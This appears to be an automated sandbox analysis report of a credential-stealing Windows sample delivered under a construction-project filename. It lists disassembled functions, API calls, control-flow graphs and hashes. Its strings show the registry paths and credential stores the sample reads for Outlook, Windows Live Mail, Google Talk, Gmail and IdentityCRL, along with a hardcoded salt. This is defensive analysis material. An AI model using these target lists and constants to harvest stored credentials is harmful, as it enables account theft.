                                                                                                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                          • pstorec.dll, xrefs: 00403C30
                                                                                                                          • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                          • API String ID: 1197458902-317895162
                                                                                                                          • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                          • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                          • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                          • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                                          Function 0044B49F Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                          • String ID: h4ND
                                                                                                                          • API String ID: 3662548030-3825183422
                                                                                                                          • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                          • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                                          • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                          • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C
                                                                                                                          Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                          • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                            • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                            • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                            • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                            • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                          • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                          • API String ID: 2768085393-1693574875
                                                                                                                          • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                          • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                          • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                          • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                                          Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0044430B
                                                                                                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                            • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                            • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                            • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                            • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                          • memset.MSVCRT ref: 00444379
                                                                                                                          • memset.MSVCRT ref: 00444394
                                                                                                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                          • strlen.MSVCRT ref: 004443DB
                                                                                                                          • _strcmpi.MSVCRT ref: 00444401
                                                                                                                          Strings
                                                                                                                          • Store Root, xrefs: 004443A5
                                                                                                                          • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                          • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                          • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                          • API String ID: 832325562-2578778931
                                                                                                                          • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                          • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                          • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                          • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                                          Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040F567
                                                                                                                          • memset.MSVCRT ref: 0040F57F
                                                                                                                            • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                          • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2012582556-3916222277
                                                                                                                          • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                          • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                          • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                          • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                          Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004037EB
                                                                                                                          • memset.MSVCRT ref: 004037FF
                                                                                                                            • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                            • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                          • strchr.MSVCRT ref: 0040386E
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                          • strlen.MSVCRT ref: 00403897
                                                                                                                          • sprintf.MSVCRT ref: 004038B7
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                          • String ID: %s@yahoo.com
                                                                                                                          • API String ID: 317221925-3288273942
                                                                                                                          • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                          • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                          • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                          • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                          Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403504
                                                                                                                          • memset.MSVCRT ref: 0040351A
                                                                                                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                          • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                          • _mbscat.MSVCRT ref: 0040356D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                          • API String ID: 3071782539-966475738
                                                                                                                          • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                          • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                          • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                          • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                          Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 356 40ccd7-40cd06 ??2@YAPAXI@Z 357 40cd08-40cd0d 356->357 358 40cd0f 356->358 359 40cd11-40cd24 ??2@YAPAXI@Z 357->359 358->359 360 40cd26-40cd2d call 404025 359->360 361 40cd2f 359->361 363 40cd31-40cd57 360->363 361->363 364 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 363->364 365 40cd59-40cd60 DeleteObject 363->365 365->364
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                                          • memset.MSVCRT ref: 0040CD96
                                                                                                                          • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2054149589-0
                                                                                                                          • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                          • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                          • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                          • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                          Function 0044B40E Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 373 44b40e-44b415 GetModuleHandleA 374 44b455 373->374 375 44b417-44b426 call 44b42b 373->375 377 44b457-44b45b 374->377 385 44b48d 375->385 386 44b428-44b433 GetProcAddress 375->386 379 44b45d-44b465 GetModuleHandleA 377->379 380 44b49a call 44b49f 377->380 383 44b467-44b46f 379->383 383->383 384 44b471-44b474 383->384 384->377 388 44b476-44b478 384->388 389 44b48e-44b496 385->389 386->374 387 44b435-44b442 VirtualProtect 386->387 390 44b454 387->390 391 44b444-44b452 VirtualProtect 387->391 392 44b47e-44b486 388->392 393 44b47a-44b47c 388->393 395 44b498 389->395 390->374 391->390 396 44b487-44b488 GetProcAddress 392->396 393->396 395->384 396->385
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                            • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                            • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                            • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2099061454-0
                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                          • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                          • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                          Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                            • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                            • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                          • memset.MSVCRT ref: 00408620
                                                                                                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                          • memset.MSVCRT ref: 00408671
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                          Strings
                                                                                                                          • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                          • String ID: Software\Google\Google Talk\Accounts
                                                                                                                          • API String ID: 1366857005-1079885057
                                                                                                                          • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                          • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                          • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
